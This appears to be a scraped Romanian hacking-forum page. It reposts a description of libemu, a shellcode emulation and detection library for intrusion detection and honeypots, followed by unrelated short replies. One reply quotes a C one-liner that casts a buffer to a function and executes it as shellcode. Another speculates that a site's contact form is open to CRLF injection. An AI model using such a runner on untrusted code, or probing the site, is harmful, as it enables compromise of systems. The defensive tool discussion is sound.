[h=1]libemu – x86 Shellcode Emulation[/h] libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. It is designed to be used within network intrusion/prevention detections and honeypots. libemu supports: Executing x86 instructions Reading x86 binary code Register emulation Basic FPU emulation [*]Shellcode execution Shellcode detection Using GetPC heuristics Static analysis Binary backwardstraversal [*]Win32 API hooking With libemu one can: Detect shellcodes Execute the shellcodes Profile shellcode behaviour Download: http://sourceforge.net/projects/nepenthes/files/libemu%20development/0.1.0/ Sursa si Info: libemu – x86 Shellcode Emulation
-
E util cand vezi niste sintaxe mai urate si iti e lene sa aranjezi codul sa il intelegi. (*(void(*)()) SC)();
-
Super, ceva in romana... Ceva in engleza: MEGAUPLOAD - The leading online storage and file delivery service
-
Nu ma pricep, dar parca trebuia (neaparat) sa ii faci jailbreak.
-
Iti recomand sa te axezi pe un singur limbaj, maixm 2: unul de programare - C++ si unul de scripting/Web - PHP. Dar si C#-ul e util daca vrei sa faci ceva rapid si usor. Bun venit.
-
Mail de cocalari: h4ck3r@expect-us.net Formular de contact fara CAPTCHA, probabil vulnerabil la CRLF: Contact Gramatica 1337: "Tutorialz" Meniu penibil facut cu cine stie ce porcarie: "Gooey Menu script" Design-ul inseamna niste tabele de faceam in clasa a IX-a. Pe scurt: rahat.